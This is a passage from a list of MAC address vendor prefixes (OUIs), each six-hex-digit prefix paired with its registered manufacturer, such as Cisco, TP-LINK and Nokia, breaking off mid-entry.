2C2997 Microsoft Corporation 8C9109 Toyoshima Electric Technoeogy(Suzhou) Co.,Ltd. 54098D deister electronic GmbH 00E6E8 Netzin Technology Corporation,.Ltd. 908C09 Total Phase DC2F03 Step forward Group Co., Ltd. 380E7B V.P.S. Thai Co., Ltd 409B0D Shenzhen Yourf Kwan Industrial Co., Ltd 70FC8C OneAccess SA 2C3796 CYBO CO.,LTD. 587FB7 SONAR INDUSTRIAL CO., LTD. 10C67E SHENZHEN JUCHIN TECHNOLOGY CO., LTD 8486F3 Greenvity Communications D46132 Pro Concept Manufacturer Co.,Ltd. 54A050 ASUSTek COMPUTER INC. 58108C Intelbras 4C7403 BQ 8C5D60 UCI Corporation Co.,Ltd. 4C2C83 Zhejiang KaNong Network Technology Co.,Ltd. 849681 Cathay Communication Co.,Ltd 2CA30E POWER DRAGON DEVELOPMENT LIMITED BC6B4D Nokia C8D019 Shanghai Tigercel Communication Technology Co.,Ltd 902181 Shanghai Huaqin Telecom Technology Co.,Ltd 1C5216 DONGGUAN HELE ELECTRONICS CO., LTD 6050C1 Kinetek Sports 6099D1 Vuzix / Lenovo B04515 mira fitness,LLC. 14488B Shenzhen Doov Technology Co.,Ltd 20ED74 Ability enterprise co.,Ltd. 6C0273 Shenzhen Jin Yun Video Equipment Co., Ltd. 80F8EB RayTight D437D7 zte corporation 2C1A31 Electronics Company Limited 2012D5 Scientech Materials Corporation 6C6EFE Core Logic Inc. 3808FD Silca Spa 2C010B NASCENT Technology, LLC - RemKon 04DEDB Rockport Networks Inc 1C4840 IMS Messsysteme GmbH 54DF00 Ulterius Technologies, LLC A056B2 Harman/Becker Automotive Systems GmbH 44666E IP-LINE 5CB6CC NovaComm Technologies Inc. 5C1515 ADVAN 244F1D iRule LLC 94AEE3 Belden Hirschmann Industries (Suzhou) Ltd. 784561 CyberTAN Technology Inc. 94CE31 CTS Limited 705B2E M2Communication Inc. B40AC6 DEXON Systems Ltd. ECD9D1 Shenzhen TG-NET Botone Technology Co.,Ltd. 2829CC Corsa Technology Incorporated E85D6B Luminate Wireless 90B686 Murata Manufacturing Co., Ltd. 4826E8 Tek-Air Systems, Inc. 581F67 Open-m technology limited A012DB TABUCHI ELECTRIC CO.,LTD 34C5D0 Hagleitner Hygiene International GmbH 10C37B ASUSTek COMPUTER INC. B40B44 Smartisan Technology Co., Ltd. 3431C4 AVM GmbH 184A6F Alcatel-Lucent Shanghai Bell Co., Ltd 50FEF2 Sify Technologies Ltd D059E4 Samsung Electronics Co.,Ltd 14A364 Samsung Electronics Co.,Ltd 30918F Technicolor Delivery Technologies Belgium NV 5CF4AB Zyxel Communications Corporation 08B2A3 Cynny Italia S.r.L. FCE186 A3M Co., LTD 54EF92 Shenzhen Elink Technology Co., LTD 08DF1F Bose Corporation 488244 Life Fitness / Div. of Brunswick 481A84 Pointer Telocation Ltd DC663A Apacer Technology Inc. D05AF1 Shenzhen Pulier Tech CO.,Ltd D4CFF9 Shenzhen SEI Robotics Co.,Ltd 24336C Private ECE512 tado GmbH C83168 eZEX corporation 40B3CD Chiyoda Electronics Co.,Ltd. 0C2026 noax Technologies AG 54C80F TP-LINK TECHNOLOGIES CO.,LTD. E4D332 TP-LINK TECHNOLOGIES CO.,LTD. A0DA92 Nanjing Glarun Atten Technology Co. Ltd. 1889DF CerebrEX Inc. B06971 DEI Sales, Inc. 28656B Keystone Microtech Corporation CC9F35 Transbit Sp. z o.o. F03FF8 R L Drake 648D9E IVT Electronic Co.,Ltd C09D26 Topicon HK Lmd. 442938 NietZsche enterprise Co.Ltd. 202564 PEGATRON CORPORATION C8D590 FLIGHT DATA SYSTEMS 7CFF62 Huizhou Super Electron Technology Co.,Ltd. 283B96 Cool Control LTD 70305D Ubiquoss Inc ECF72B HD DIGITAL TECH CO., LTD. 4CF45B Blue Clover Devices B0C554 D-Link International CC95D7 Vizio, Inc FC09F6 GUANGDONG TONZE ELECTRIC CO.,LTD BCF61C Geomodeling Wuxi Technology Co. Ltd. 086DF2 Shenzhen MIMOWAVE Technology Co.,Ltd 687848 WESTUNITIS CO., LTD. 48D0CF Universal Electronics, Inc. D42F23 Akenori PTE Ltd 98C0EB Global Regency Ltd D09C30 Foster Electric Company, Limited 949F3F Optek Digital Technology company limited E817FC Fujitsu Cloud Technologies Limited 78FEE2 Shanghai Diveo Technology Co., Ltd 14C089 DUNE HD LTD F4B6E5 TerraSem Co.,Ltd A881F1 BMEYE B.V. D069D0 Verto Medical Solutions, LLC C4E984 TP-LINK TECHNOLOGIES CO.,LTD. FC07A0 LRE Medical GmbH 1CEEE8 Ilshin Elecom DCC793 Nokia Corporation 444891 HDMI Licensing, LLC FC923B Nokia Corporation E03F49 ASUSTek COMPUTER INC. 9C3EAA EnvyLogic Co.,Ltd. F8F005 Newport Media Inc. 1CFCBB Realfiction ApS 5C254C Avire Global Pte Ltd FC1349 Global Apps Corp. 848433 Paradox Engineering SA 602103 I4VINE, INC 44C306 SIFROM Inc. 60FFDD C.E. ELECTRONICS, INC 88A73C Ragentek Technology Group 88D962 Canopus Systems US LLC 24050F MTN Electronic Co. Ltd AC2DA3 TXTR GmbH 889CA6 BTB Korea INC 90837A General Electric Water & Process Technologies A43A69 Vers Inc B0D7C5 Logipix Ltd 48EE86 UTStarcom (China) Co.,Ltd 888914 All Components Incorporated F0321A Mita-Teknik A/S 9031CD Onyx Healthcare Inc. E48184 Nokia E056F4 AxesNetwork Solutions inc. 84569C Coho Data, Inc., 78AE0C Far South Networks 2C5A05 Nokia Corporation D481CA iDevices, LLC D858D7 CZ.NIC, z.s.p.o. 4CD9C4 Magneti Marelli Automotive Electronics (Guangzhou) Co. Ltd 9C44A6 SwiftTest, Inc. B024F3 Progeny Systems 0C54A5 PEGATRON CORPORATION 8C4DB9 Unmonday Ltd 80BAE6 Neets F8A2B4 RHEWA-WAAGENFABRIK August Freudewald GmbH &Co. KG 78CA5E ELNO 68764F Sony Corporation 38DBBB Sunbow Telecom Co., Ltd. 448A5B Micro-Star INT'L CO., LTD. 0CCB8D ASCO Numatics GmbH 6C4B7F Vossloh-Schwabe Deutschland GmbH 688AB5 EDP Servicos 2493CA Voxtronic Austria B4827B AKG Acoustics GmbH DC5E36 Paterson Technology 50E0C7 TurControlSystme AG DCAD9E GreenPriz B8DF6B SpotCam Co., Ltd. 9C8888 Simac Techniek NV 18C8E7 Shenzhen Hualistone Technology Co.,Ltd A03B1B Inspire Tech 7CCD3C Guangzhou Juzing Technology Co., Ltd 10B26B base Co.,Ltd. 4CF02E Vifa Denmark A/S 9843DA INTERTECH 08CA45 Toyou Feiji Electronics Co., Ltd. 3CCA87 Iders Incorporated 7C6AB3 IBC TECHNOLOGIES INC. 181BEB Actiontec Electronics, Inc 908C44 H.K ZONGMU TECHNOLOGY CO., LTD. DCCEBC Shenzhen JSR Technology Co.,Ltd. 041A04 WaveIP 34A5E1 Sensorist ApS 84A783 Alcatel Lucent 907990 Benchmark Electronics Romania SRL 78D99F NuCom HK Ltd. 142BD2 Armtel Ltd. 9CA10A SCLE SFE 88789C Game Technologies SA 54BEF7 PEGATRON CORPORATION A4895B ARK INFOSOLUTIONS PVT LTD D09D0A LINKCOM EC219F VidaBox LLC A8CCC5 Saab AB (publ) 988E4A NOXUS(BEIJING) TECHNOLOGY CO.,LTD 58468F Koncar Electronics and Informatics 985D46 PeopleNet Communication F89FB8 YAZAKI Energy System Corporation 540536 Vivago Oy 8079AE ShanDong Tecsunrise Co.,Ltd 7CBD06 AE REFUsol 94BA56 Shenzhen Coship Electronics Co., Ltd. F0F5AE Adaptrum Inc. FC3FAB Henan Lanxin Technology Co., Ltd EC2AF0 Ypsomed AG 50B888 wi2be Tecnologia S/A F854AF ECI Telecom Ltd. 6C8366 Nanjing SAC Power Grid Automation Co., Ltd. F83D4E Softlink Automation System Co., Ltd 740EDB Optowiz Co., Ltd 442AFF E3 Technology, Inc. 7C8306 Glen Dimplex Nordic as 140D4F Flextronics International 5422F8 zte corporation 486E73 Pica8, Inc. 6C90B1 SanLogic Inc E0FAEC Platan sp. z o.o. sp. k. 446755 Orbit Irrigation 7CE56B ESEN Optoelectronics Technology Co.,Ltd. D44C9C Shenzhen YOOBAO Technology Co.Ltd 509871 Inventum Technologies Private Limited 048C03 ThinPAD Technology (Shenzhen)CO.,LTD 88462A Telechips Inc. C80258 ITW GSE ApS 30786B TIANJIN Golden Pentagon Electronics Co., Ltd. 20DF3F Nanjing SAC Power Grid Automation Co., Ltd. 4CD637 Qsono Electronics Co., Ltd 9436E0 Sichuan Bihong Broadcast & Television New Technologies Co.,Ltd D0737F Mini-Circuits F42012 Cuciniale GmbH 98B039 Nokia B830A8 Road-Track Telematics Development 6405BE NEW LIGHT LED E8BB3D Sino Prime-Tech Limited 28285D Zyxel Communications Corporation 646EEA Iskratel d.o.o. 088E4F SF Software Solutions ACCA8E ODA Technologies DC1792 Captivate Network CC7B35 zte corporation 04D437 ZNV CCF407 EUKREA ELECTROMATIQUE SARL 20CEC4 Peraso Technologies CC4703 Intercon Systems Co., Ltd. 28A241 exlar corp F82BC8 Jiangsu Switter Co., Ltd 60C397 2Wire Inc 58E02C Micro Technic A/S 78B3CE Elo touch solutions 34A68C Shine Profit Development Limited 949FB4 ChengDu JiaFaAnTai Technology Co.,Ltd 406826 Thales UK Limited E8CE06 SkyHawke Technologies, LLC. C8F386 Shenzhen Xiaoniao Technology Co.,Ltd 2C72C3 Soundmatters C44838 Satcom Direct, Inc. 341A4C SHENZHEN WEIBU ELECTRONICS CO.,LTD. 88142B Protonic Holland A4FCCE Security Expert Ltd. F8516D Denwa Technology Corp. 444A65 Silverflare Ltd. 744BE9 EXPLORER HYPERTECH CO.,LTD FC6018 Zhejiang Kangtai Electric Co., Ltd. E07F88 EVIDENCE Network SIA 1C7CC7 Coriant GmbH 341B22 Grandbeing Technology Co., Ltd 40560C In Home Displays Ltd 0CF019 Malgn Technology Co., Ltd. 70C6AC Bosch Automotive Aftermarket 0488E2 Beats Electronics LLC A47ACF VIBICOM COMMUNICATIONS INC. BC261D HONG KONG TECON TECHNOLOGY 204C6D Hugo Brennenstuhl Gmbh & Co. KG. 40C4D6 ChongQing Camyu Technology Development Co.,Ltd. A0861D Chengdu Fuhuaxin Technology co.,Ltd 508D6F CHAHOO Limited 308999 Guangdong East Power Co., C8DDC9 Lenovo Mobile Communication Technology Ltd. 6C8686 Technonia D4AC4E BODi rS, LLC 2C69BA RF Controls, LLC D4BF7F UPVEL 842F75 Innokas Group CC3C3F SA.S.S. Datentechnik AG E8DE27 TP-LINK TECHNOLOGIES CO.,LTD. 282CB2 TP-LINK TECHNOLOGIES CO.,LTD. 64E599 EFM Networks 7C0507 PEGATRON CORPORATION 880905 MTMCommunications 30D46A Autosales Incorporated C89346 MXCHIP Company Limited F4B381 WindowMaster A/S 74F102 Beijing HCHCOM Technology Co., Ltd A8294C Precision Optical Transceivers, Inc. 9C9726 Technicolor Delivery Technologies Belgium NV 94ACCA trivum technologies GmbH 908260 IEEE 1904.1 Working Group D4EE07 HIWIFI Co., Ltd. FCAD0F QTS NETWORKS 984C04 Zhangzhou Keneng Electrical Equipment Co Ltd F0F260 Mobitec AB A4E991 SISTEMAS AUDIOVISUALES ITELSIS S.L. 3C86A8 Sangshin elecom .co,, LTD 84F493 OMS spol. s.r.o. BCD177 TP-LINK TECHNOLOGIES CO.,LTD. 044CEF Fujian Sanao Technology Co.,Ltd 4C804F Armstrong Monitoring Corp 7CD762 Freestyle Technology Pty Ltd 901D27 zte corporation ACDBDA Shenzhen Geniatech Inc, Ltd D42751 Infopia Co., Ltd 68A40E BSH Hausgeräte GmbH F05DC8 Duracell Powermat CC5D57 Information System Research Institute,Inc. 64C667 Barnes&Noble 103DEA HFC Technology (Beijing) Ltd. Co. B01408 LIGHTSPEED INTERNATIONAL CO. 081DFB Shanghai Mexon Communication Technology Co.,Ltd F4C6D7 blackned GmbH 4CCA53 Skyera, Inc. 90FF79 Metro Ethernet Forum D4CA6E u-blox AG 9C3178 Foshan Huadian Intelligent Communications Teachnologies Co.,Ltd 983F9F China SSJ (Suzhou) Network Technology Inc. B838CA Kyokko Tsushin System CO.,LTD 40270B Mobileeco Co., Ltd E4EEFD MR&D Manufacturing 105CBF DuroByte Inc 5C43D2 HAZEMEYER D809C3 Cercacor Labs E0C2B7 Masimo Corporation B0C95B Beijing Symtech CO.,LTD 38B5BD E.G.O. Elektro-Ger 2CE871 Alert Metalguard ApS F87B62 FASTWEL INTERNATIONAL CO., LTD. Taiwan Branch C44EAC Shenzhen Shiningworth Technology Co., Ltd. 20918A PROFALUX A80180 IMAGO Technologies GmbH 0C5521 Axiros GmbH E4E409 LEIFHEIT AG 68B8D9 Act KDE, Inc. 90CC24 Synaptics, Inc 004D32 Andon Health Co.,Ltd. 24F2DD Radiant Zemax LLC 20B5C6 Mimosa Networks 9C541C Shenzhen My-power Technology Co.,Ltd 8C3330 EmFirst Co., Ltd. 087BAA SVYAZKOMPLEKTSERVICE, LLC EC4993 Qihan Technology Co., Ltd B0ACFA FUJITSU LIMITED A46E79 DFT System Co.Ltd C88A83 Dongguan HuaHong Electronics Co.,Ltd 74FE48 ADVANTECH CO., LTD. 80B95C ELFTECH Co., Ltd. A01917 Bertel S.p.a. FCA9B0 MIARTECH (SHANGHAI),INC. 7898FD Q9 Networks Inc. 8CC5E1 ShenZhen Konka Telecommunication Technology Co.,Ltd 64A341 Wonderlan (Beijing) Technology Co., Ltd. D063B4 SolidRun Ltd. 2C441B Spectrum Medical Limited B877C3 METER Group C44567 SAMBON PRECISON and ELECTRONICS E45614 Suttle Apparatus 3C83B5 Advance Vision Electronics Co. Ltd. 28A192 GERP Solution 681CA2 Rosewill Inc. 604616 XIAMEN VANN INTELLIGENT CO., LTD 6C40C6 Nimbus Data, Inc. 1048B1 Beijing Duokan Technology Limited A44E2D Adaptive Wireless Solutions, LLC 0CCDFB EDIC Systems Inc. 9C8D1A INTEG process group inc 480362 DESAY ELECTRONICS(HUIZHOU)CO.,LTD 18673F Hanover Displays Limited 9C0473 Tecmobile (International) Ltd. 5011EB SilverNet Ltd 54DF63 Intrakey technologies GmbH 8CE081 zte corporation 7C0A50 J-MEX Inc. 40F2E9 IBM 744D79 Arrive Systems Inc. D493A0 Fidelix Oy 08EBED World Elite Technology Co.,LTD 48F8B3 Cisco-Linksys, LLC B4DFFA Litemax Electronics Inc. FC52CE Control iD 5C4A26 Enguity Technology Corp D8D27C JEMA ENERGY, SA B01203 Dynamics Hong Kong Limited 9886B1 Flyaudio corporation (China) 7093F8 Space Monkey, Inc. 28B3AB Genmark Automation C4E7BE SCSpro Co.,Ltd 58874C LITE-ON CLEAN ENERGY TECHNOLOGY CORP. 2891D0 Stage Tec Entwicklungsgesellschaft für professionelle Audiotechnik mbH C0BD42 ZPA Smart Energy a.s. 20DC93 Cheetah Hi-Tech, Inc. 106FEF Ad-Sol Nissin Corp 2C625A Finest Security Systems Co., Ltd 2074CF Shenzhen Voxtech Co.,Ltd A8EF26 Tritonwave 60F2EF VisionVera International Co., Ltd. C03F2A Biscotti, Inc. 381C4A SIMCom Wireless Solutions Co.,Ltd. 5C2479 Baltech AG D82DE1 Tricascade Inc. 14358B Mediabridge Products, LLC. 00F403 Orbis Systems Oy 547398 Toyo Electronics Corporation C4393A SMC Networks Inc 543968 Edgewater Networks Inc 440CFD NetMan Co., Ltd. 8CD3A2 VisSim AS D8C691 Hichan Technology Corp. E43FA2 Wuxi DSP Technologies Inc. F4B72A TIME INTERCONNECT LTD E0F5CA CHENG UEI PRECISION INDUSTRY CO.,LTD. DC9FA4 Nokia Corporation 44C39B OOO RUBEZH NPO 749975 IBM Corporation 48282F zte corporation EC1A59 Belkin International Inc. 881036 Panodic(ShenZhen) Electronics Limted 68B6FC Hitron Technologies. Inc 60CBFB AirScape Inc. 4423AA Farmage Co., Ltd. 7CFE28 Salutron Inc. E8102E Really Simple Software, Inc 0C565C HyBroad Vision (Hong Kong) Technology Co Ltd 8C6AE4 Viogem Limited A0EF84 Seine Image Int'l Co., Ltd 0808EA AMSC A4934C Cisco Systems, Inc D0D212 K2NET Co.,Ltd. 80D18B Hangzhou I'converge Technology Co.,Ltd 4088E0 Beijing Ereneben Information Technology Limited Shenzhen Branch E85484 NEO Information Systems Co., Ltd. 1C8464 FORMOSA WIRELESS COMMUNICATION CORP. 64517E LONG BEN (DONGGUAN) ELECTRONIC TECHNOLOGY CO.,LTD. D43D7E Micro-Star Int'l Co, Ltd ACD9D6 tci GmbH 7C160D Saia-Burgess Controls AG A497BB Hitachi Industrial Equipment Systems Co.,Ltd 4C5427 Linepro Sp. z o.o. B0435D NuLEDs, Inc. ECA29B Kemppi Oy C4BA99 I+ME Actia Informatik und Mikro-Elektronik GmbH 04CE14 Wilocity LTD. E8D483 ULTIMATE Europe Transportation Equipment GmbH E0A30F Pevco 88DC96 EnGenius Technologies, Inc. 20443A Schneider Electric Asia Pacific Ltd 74AE76 iNovo Broadband, Inc. 709A0B Italian Institute of Technology EC9327 MEMMERT GmbH + Co. KG 142DF5 Amphitech B45570 Borea 346E8A Ecosense 64F242 Gerdes Aktiengesellschaft 60F281 TRANWO TECHNOLOGY CO., LTD. 0CC0C0 MAGNETI MARELLI SISTEMAS ELECTRONICOS MEXICO 942197 Stalmart Technology Limited B0D2F5 Vello Systems, Inc. 08379C Topaz Co. LTD. D80DE3 FXI TECHNOLOGIES AS A0C3DE Triton Electronic Systems Ltd. D0699E LUMINEX Lighting Control Equipment 100D2F Online Security Pty. Ltd. 3C98BF Quest Controls, Inc. D0AEEC Alpha Networks Inc. 5057A8 Cisco Systems, Inc 00DEFB Cisco Systems, Inc 3CA315 Bless Information & Communications Co., Ltd E81324 GuangZhou Bonsoninfo System CO.,LTD F0FDA0 Acurix Networks Pty Ltd F83094 Alcatel-Lucent Telecom Limited C495A2 SHENZHEN WEIJIU INDUSTRY AND TRADE DEVELOPMENT CO., LTD 8C6878 Nortek-AS 202598 Teleview 38F8B7 V2COM PARTICIPACOES S.A. A04CC1 Helixtech Corp. 34A7BA Fischer International Systems Corporation F473CA Conversion Sound Inc. F8F7FF SYN-TECH SYSTEMS INC E4C806 Ceiec Electric Technology Inc. E0F9BE Cloudena Corp. B88F14 Analytica GmbH 10A932 Beijing Cyber Cloud Technology Co. ,Ltd. 34FC6F ALCEA C0B357 Yoshiki Electronics Industry Ltd. A81758 Elektronik System i Umeå AB 08B4CF Abicom International 7C94B2 Philips Healthcare PCCI 442B03 Cisco Systems, Inc E477D4 Minrray Industry Co.,Ltd 38E08E Mitsubishi Electric Corporation 60E956 Ayla Networks, Inc EC1120 FloDesign Wind Turbine Corporation F897CF DAESHIN-INFORMATION TECHNOLOGY CO., LTD. 3C4E47 Etronic A/S F48771 Infoblox E86D6E voestalpine Signaling UK Ltd. 882012 LMI Technologies 0463E0 Nome Oy B49EE6 SHENZHEN TECHNOLOGY CO LTD BC4B79 SensingTek 00376D Murata Manufacturing Co., Ltd. 681605 Systems And Electronic Development FZCO F8D462 Pumatronix Equipamentos Eletronicos Ltda. A0DC04 Becker-Antriebe GmbH 40605A Hawkeye Tech Co. Ltd 88C36E Beijing Ereneben lnformation Technology Limited 645422 Equinox Payments 080D84 GECO, Inc. 645563 Intelight Inc. 5CEB4E R. STAHL HMI Systems GmbH 34AA99 Nokia 24B88C Crenus Co.,Ltd. 5453ED Sony Corporation A49005 CHINA GREATWALL COMPUTER SHENZHEN CO.,LTD C40ACB Cisco Systems, Inc D4A02A Cisco Systems, Inc 943AF0 Nokia Corporation 4C9E80 KYOKKO ELECTRIC Co., Ltd. 50008C Hong Kong Telecommunications (HKT) Limited 306E5C Validus Technologies C894D2 Jiangsu Datang Electronic Products Co., Ltd C8A620 Nebula, Inc FC946C UBIVELOX 407B1B Mettle Networks Inc. 40D559 MICRO S.E.R.I. 94E0D0 HealthStream Taiwan Inc. DCF858 Lorent Networks, Inc. 940B2D NetView Technologies(Shenzhen) Co., Ltd 9CCAD9 Nokia Corporation 046D42 Bryston Ltd. D8E743 Wush, Inc 88E712 Whirlpool Corporation D412BB Quadrant Components Inc. Ltd BCFE8C Altronic, LLC 649EF3 Cisco Systems, Inc D8052E Skyviia Corporation 80946C TOKYO RADAR CORPORATION 3CE624 LG Display D8F0F2 Zeebo Inc 306CBE Skymotion Technology (HK) Limited 803F5D Winstars Technology Ltd 40BF17 Digistar Telecom. SA 644D70 dSPACE GmbH D0CF5E Energy Micro AS DCC101 SOLiD Technologies, Inc. 1803FA IBT Interfaces 24BBC1 Absolute Analysis 806007 RIM 00E175 AK-Systems Ltd CC501C KVH Industries, Inc. 04D783 Y&H E&C Co.,LTD. 886B76 CHINA HOPEFUL GROUP HOPEFUL ELECTRIC CO.,LTD 78F7D0 Silverbrook Research 207600 Actiontec Electronics, Inc F04B6A Scientific Production Association Siberian Arsenal, Ltd. 64AE0C Cisco Systems, Inc E8DA96 Zhuhai Tianrui Electrical Power Tech. Co., Ltd. 94319B Alphatronics BV E878A1 BEOVIEW INTERCOM DOO CCEF48 Cisco Systems, Inc 2437EF EMC Electronic Media Communication SA EC6264 Global411 Internet Services, LLC 00F051 KWB Gmbh 489BE2 SCI Innovations Ltd 80FFA8 UNIDIS E435FB Sabre Technology (Hull) Ltd C83B45 JRI C058A7 Pico Systems Co., Ltd. EC3F05 Institute 706, The Second Academy China Aerospace Science & Industry Corp B0E50E NRG SYSTEMS INC 48C1AC PLANTRONICS, INC. 98588A SYSGRATION Ltd. 183825 Wuhan Lingjiu High-tech Co.,Ltd. 7C4B78 Red Sun Synthesis Pte Ltd 64A0E7 Cisco Systems, Inc 28B0CC Xenya d.o.o. 205B5E Shenzhen Wonhe Technology Co., Ltd 780738 Z.U.K. Elzab S.A. 2037BC Kuipers Electronic Engineering BV F013C3 SHENZHEN FENDA TECHNOLOGY CO., LTD 04A82A Nokia Corporation E44E18 Gardasoft VisionLimited 2046A1 VECOW Co., Ltd FC01CD FUNDACION TEKNIKER 9C8BF1 The Warehouse Limited 84248D Zebra Technologies Inc FCE892 Hangzhou Lancable Technology Co.,Ltd D453AF VIGO System S.A. 148A70 ADS GmbH B4D8DE iota Computing, Inc. C8903E Pakton Technologies 54CDA7 Fujian Shenzhou Electronic Co.,Ltd A06E50 Nanotek Elektronik Sistemler Ltd. Sti. 1071F9 Cloud Telecomputers, LLC B8621F Cisco Systems, Inc 18AD4D Polostar Technology Corporation 94C6EB NOVA electronics, Inc. 549478 Silvershore Technology Partners DC2E6A HCT. Co., Ltd. 843F4E Tri-Tech Manufacturing, Inc. C83232 Hunting Innova 00B338 Kontron Asia Pacific Design Sdn. Bhd 34A55D TECHNOSOFT INTERNATIONAL SRL 4C774F Embedded Wireless Labs D0C282 Cisco Systems, Inc 147DB3 JOA TELECOM.CO.,LTD B0F1BC Dhemax Ingenieros Ltda F0022B Chrontel B8288B Parker Hannifin Manufacturing (UK) Ltd 90D11B Palomar Medical Technologies ECBD09 FUSION Electronics Ltd 944696 BaudTec Corporation 54847B Digital Devices GmbH 3CD16E Telepower Communication Co., Ltd 508ACB SHENZHEN MAXMADE TECHNOLOGY CO., LTD. 40040C A&T 3C2763 SLE quality engineering GmbH & Co. KG FC2E2D Lorom Industrial Co.LTD. 00FC70 Intrepid Control Systems, Inc. 703AD8 Shenzhen Afoundry Electronic Co., Ltd 88F077 Cisco Systems, Inc 802E14 azeti Networks AG D4C1FC Nokia Corporation 34BCA6 Beijing Ding Qing Technology, Ltd. 5835D9 Cisco Systems, Inc 64D912 Solidica, Inc. 94E848 FYLDE MICRO LTD AC5E8C Utillink 704AAE Xstream Flow (Pty) Ltd 40B3FC Logital Co. Limited DC3C84 Ticom Geomatics, Inc. D0131E Sunrex Technology Corp B09928 FUJITSU LIMITED 04E1C8 IMS Soluções em Energia Ltda. 587521 CJSC RTSoft 948FEE Verizon Telematics 50D6D7 Takahata Precision C40F09 Hermes electronic GmbH C47B2F Beijing JoinHope Image Technology Ltd. 948B03 EAGET Innovation and Technology Co., Ltd. 48F47D TechVision Holding Internation Limited F081AF IRZ AUTOMATION TECHNOLOGIES LTD 701404 Limited Liability Company 18E288 STT Condigi B435F7 Zhejiang Pearmain Electronics Co.ltd. 9866EA Industrial Control Communications, Inc. 983000 Beijing KEMACOM Technologies Co., Ltd. 90CF15 Nokia Corporation 14A9E3 MST CORPORATION 5C0CBB CELIZION Inc. C4242E Galvanic Applied Sciences Inc 7C4A82 Portsmith LLC 2C0033 EControls, LLC AC199F SUNGROW POWER SUPPLY CO.,LTD. 1C35F1 NEW Lift Neue Elektronische Wege Steuerungsbau GmbH 803457 OT Systems Limited CCF3A5 Chi Mei Communication Systems, Inc F0AE51 Xi3 Corp B80B9D ROPEX Industrie-Elektronik GmbH 5070E5 He Shan World Fair Electronics Technology Limited F8EA0A Dipl.-Math. Michael Rauch 24C86E Chaney Instrument Co. 802275 Beijing Beny Wave Technology Co Ltd 306118 Paradom Inc. 4C7367 Genius Bytes Software Solutions GmbH 90EA60 SPI Lasers Ltd F87B8C Amped Wireless 241A8C Squarehead Technology AS D44F80 Kemper Digital GmbH A41BC0 Fastec Imaging Corporation 205B2A Private 3831AC WEG 584C19 Chongqing Guohong Technology Development Company Limited 6469BC Hytera Communications Co .,ltd B4F323 PETATEL INC. 3CA72B MRV Communications (Networks) LTD 285132 Shenzhen Prayfly Technology Co.,Ltd E42FF6 Unicore communication Inc. 84D9C8 Unipattern Co., 94AAB8 Joview(Beijing) Technology Co. Ltd. 28F358 2C - Trifonov & Co 301A28 Mako Networks Ltd 88E0A0 Shenzhen VisionSTOR Technologies Co., Ltd FC10BD Control Sistematizado S.A. F0C27C Mianyang Netop Telecom Equipment Co.,Ltd. 283410 Enigma Diagnostics Limited 0CE82F Bonfiglioli Vectron GmbH 40F4EC Cisco Systems, Inc 14B73D ARCHEAN Technologies 948D50 Beamex Oy Ab A433D1 Fibrlink Communications Co.,Ltd. 14C21D Sabtech Industries C88439 Sunrise Technologies EC7D9D CPI C81E8E ADV Security (S) Pte Ltd A88792 Broadband Antenna Tracking Systems F40321 BeNeXt B.V. A071A9 Nokia Corporation A4E32E Silicon & Software Systems Ltd. 5CBD9E HONGKONG MIRACLE EAGLE TECHNOLOGY(GROUP) LIMITED 08E672 JEBSEE ELECTRONICS CO.,LTD. 14F0C5 Xtremio Ltd. E8C229 H-Displays (MSC) Bhd 04E662 Acroname Inc. F0BF97 Sony Corporation C44AD0 FIREFLIES SYSTEMS A862A2 JIWUMEDIA CO., LTD. 984E97 Starlight Marketing (H. K.) Ltd. 64DC01 Static Systems Group PLC 3CC0C6 d&b audiotechnik GmbH 78A683 Precidata FC1FC0 EURECAM BC6784 Environics Oy F8C678 Carefusion 6CAB4D Digital Payment Technologies 2CB0DF Soliton Technologies Pvt Ltd ECE555 Hirschmann Automation 58F98E SECUDOS GmbH B8E589 Payter BV 607688 Velodyne 78CD8E SMC Networks Inc 2C8065 HARTING Inc. of North America C8C126 ZPM Industria e Comercio Ltda 64DE1C Kingnetic Pte Ltd 4468AB JUIN COMPANY, LIMITED F81037 Atopia Systems, LP E05FB9 Cisco Systems, Inc C07E40 SHENZHEN XDK COMMUNICATION EQUIPMENT CO.,LTD E44F29 MA Lighting Technology GmbH B4C44E VXL eTech Pvt Ltd 707EDE NASTEC LTD. 68DCE8 PacketStorm Communications 488E42 DIGALOG GmbH F02572 Cisco Systems, Inc 04FF51 NOVAMEDIA INNOVISION SP. Z O.O. 4CB4EA HRD (S) PTE., LTD. D44C24 Vuppalamritha Magnetic Components LTD 8091C0 AgileMesh, Inc. 084EBF Sumitomo Electric Industries, Ltd AC02CF RW Tecnologia Industria e Comercio Ltda 1C7C11 EID 48174C MicroPower technologies 349A0D ZBD Displays Ltd D41296 Anobit Technologies Ltd. 0876FF Thomson Telecom Belgium 90D852 Comtec Co., Ltd. 380197 TSST Global,Inc B4749F ASKEY COMPUTER CORP 7C4AA8 MindTree Wireless PVT Ltd E0143E Modoosis Inc. 90507B Advanced PANMOBIL Systems GmbH & Co. KG 6015C7 IdaTech DC2008 ASD Electronics Ltd 1C83B0 Linked IP GmbH A4D1D1 ECOtality North America C49313 100fio networks technology llc 68597F Alcatel Lucent F065DD Primax Electronics Ltd. 706582 Suzhou Hanming Technologies Co., Ltd. 9433DD Taco Inc E0CF2D Gemintek Corporation C4EEF5 II-VI Incorporated D491AF Electroacustica General Iberica, S.A. C4B512 General Electric Digital Energy E02538 Titan Pet Products CC7A30 CMAX Wireless Co., Ltd. 58BC27 Cisco Systems, Inc 34D2C4 RENA GmbH Print Systeme D4CBAF Nokia Corporation 10E8EE PhaseSpace A47C1F Cobham plc D46CDA CSM GmbH 588D09 Cisco Systems, Inc C0C1C0 Cisco-Linksys, LLC 20AA25 IP-NET LLC 0034F1 Radicom Research, Inc. 7C3920 SSOMA SECURITY 9C77AA NADASNV B88E3A Infinite Technologies JLT 5CD998 D-Link Corporation 1C3DE7 Sigma Koki Co.,Ltd. 8818AE Tamron Co., Ltd 20D607 Nokia Corporation 6C0460 RBH Access Technologies Inc. 706417 ORBIS TECNOLOGIA ELECTRICA S.A. B8BA72 Cynove 443D21 Nuvolt 30493B Nanjing Z-Com Wireless Co.,Ltd EC66D1 B&W Group LTD 385FC3 Yu Jeong System, Co.Ltd 888B5D Storage Appliance Corporation 78C6BB Analog Devices, Inc. 6CE0B0 SOUND4 9CFFBE OTSL Inc. 00F860 PT. Panggung Electric Citrabuana 18EF63 Cisco Systems, Inc 206FEC Braemac CA LLC A45C27 Nintendo Co., Ltd. 045D56 camtron industrial inc. 68234B Nihon Dengyo Kousaku A4BE61 EutroVision System, Inc. D07DE5 Forward Pay Systems, Inc. 04DD4C Velocytech 7CED8D Microsoft 88ACC1 Generiton Co., 